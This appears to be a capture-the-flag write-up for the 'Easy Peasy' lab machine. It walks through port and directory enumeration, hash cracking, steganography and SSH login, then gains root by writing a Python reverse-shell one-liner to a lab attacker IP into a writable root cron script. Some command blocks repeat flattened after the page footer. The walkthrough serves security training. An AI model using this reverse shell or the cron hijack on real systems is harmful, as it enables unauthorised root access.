Easy Peasy

Port 80 enumeration - Port 65524 enumeration - Stegnography - Encryptions - CronJob PrivEsc

Initial Compromise

Running a simple Nmap scan is not enough to detect all open ports since 2 services are not part of the standard ports. You’ll need to run Nmap with the -p- flag to discover the 3 running services

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))

Using gobuster against the Nginx service running on port 80/tcp allows the discovery of a /hidden directory

kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.105.32
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/24 10:08:01 Starting gobuster
===============================================================
/hidden (Status: 301)

Further enumerating this directory leads to a /hidden/whatever/ location
The analysis of the source code reveals a hidden paragraph with an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/
<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
    background-repeat: no-repeat;
    background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p>
</center>
</body>
</html>

The string is base64 encoded

$ echo -n "ZmxhZ3tmMXJzN19mbDRnfQ==" | base64 -d
flag{REDACTED}

Apache Enumeration

Simply visiting the /robots.txt page gives us

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

One of which is we'll have to change the User-Agent to a18672860d0510e5ab6699730763b250 to get further
And the second one is the User-Agent looks fishy, maybe it's md5 hash - Yes it is the flag 2 :)
The main page shows a standard Apache page, but hints have been hidden in the source code of that page

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep flag
          <a href="#flag">hi</a>
                           Fl4g 3 : flag{REDACTED}

Still in the source code of the main page, we can find a hidden paragraph with an encoded string

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/ | grep hidden
    <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>

It decodes to /n0th1ng3ls3m4tt3r with base62
Browsing the location gathered previously reveals a hash gives us

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/
<html>
<head>
<title>random title</title>
<style>
    body {
    background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg");
    background-color:black;


    }
</style>
</head>
<body>
<center>
<img src="binarycodepixabay.jpg" width="140px" height="140px"/>
<p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
</center>
</body>
</html>

Let’s crack this hash with John the Ripper using the wordlist provided in the challenge easypeasy.txt

kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt
kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The page found just previously also contains a jpg file. Let’s download the picture and decrypt the secret with steghide using the password cracked just before (mypasswordforthatjob)

kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg
kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg 
Enter passphrase: 
wrote extracted data to "secrettext.txt".
kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

This file gives us a username (boring) and a binary encoded password, which decodes to iconvertedmypasswordtobinary - We can now SSH and get a shell on the box :)

Privilege Escalation

The user is not in the sudoers but there is a cron job executed by root

boring@kral4-PC:~$ sudo -l
[sudo] password for boring: 
Sorry, user boring may not run sudo on kral4-PC.

boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

The file is owned by our user, we can modify it

boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh 
-rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh

boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh 
#!/bin/bash
# i will run as root

boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh 
#!/bin/bash
# i will run as root
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Start a listener and get R00T :)

PreviousTeam NextCmesS

Last updated 2 years ago

PORT STATE SERVICE VERSION 80/tcp open http nginx 1.16.1 6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))

kali@kali:/data/Easy_Peasy/files$ gobuster dir -u http://10.10.105.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.105.32 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/24 10:08:01 Starting gobuster =============================================================== /hidden (Status: 301)

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32/hidden/whatever/ <!DOCTYPE html> <html> <head> <title>dead end</title> <style> body { background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg"); background-repeat: no-repeat; background-size: cover; width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; } </style> </head> <body> <center> <p hidden>ZmxhZ3tmMXJzN19mbDRnfQ==</p> </center> </body> </html>

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/robots.txt User-Agent:* Disallow:/ Robots Not Allowed User-Agent:a18672860d0510e5ab6699730763b250 Allow:/ This Flag Can Enter But Only This Flag No More Exceptions

kali@kali:/data/Easy_Peasy/files$ curl -s http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/ <html> <head> <title>random title</title> <style> body { background-image: url("https://cdn.pixabay.com/photo/2018/01/26/21/20/matrix-3109795_960_720.jpg"); background-color:black; } </style> </head> <body> <center> <img src="binarycodepixabay.jpg" width="140px" height="140px"/> <p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p> </center> </body> </html>

kali@kali:/data/Easy_Peasy/files$ echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" > hash.txt kali@kali:/data/Easy_Peasy/files$ /data/src/john/run/john --wordlist=easypeasy.txt --format=GOST hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (gost, GOST R 34.11-94 [64/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status mypasswordforthatjob (?) 1g 0:00:00:00 DONE (2020-08-24 11:27) 5.555g/s 22755p/s 22755c/s 22755C/s mypasswordforthatjob..flash88 Use the "--show" option to display all of the cracked passwords reliably Session completed.

kali@kali:/data/Easy_Peasy/files$ wget http://10.10.105.32:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg kali@kali:/data/Easy_Peasy/files$ steghide extract -sf binarycodepixabay.jpg Enter passphrase: wrote extracted data to "secrettext.txt". kali@kali:/data/Easy_Peasy/files$ cat secrettext.txt username:boring password: 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

boring@kral4-PC:~$ sudo -l [sudo] password for boring: Sorry, user boring may not run sudo on kral4-PC. boring@kral4-PC:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh

boring@kral4-PC:~$ ls -l /var/www/.mysecretcronjob.sh -rwxr-xr-x 1 boring boring 33 Jun 14 22:43 /var/www/.mysecretcronjob.sh boring@kral4-PC:~$ cat /var/www/.mysecretcronjob.sh #!/bin/bash # i will run as root boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh #!/bin/bash # i will run as root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.50.72",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'